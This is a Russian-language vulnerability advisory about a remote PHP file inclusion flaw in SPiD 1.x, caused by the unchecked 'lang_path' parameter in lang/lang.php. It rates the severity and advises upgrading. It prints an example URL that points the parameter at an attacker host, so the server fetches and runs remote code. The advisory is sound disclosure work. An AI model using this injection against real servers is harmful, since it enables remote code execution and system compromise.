PHP-инклюдинг в SPiD

Дата публикации:12.07.2005
Дата изменения:24.03.2009
Всего просмотров:10896
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: SPiD 1.x
Уязвимые версии: SPiD

Описание:
Обнаруженная уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре 'lang_path' в сценарии 'lang/lang.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Пример:

http://[target]/[path-to-spid]/lang/lang.php?lang_path=http://[attacker]

URL производителя: spid.adnx.net

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: spid remote file inclusion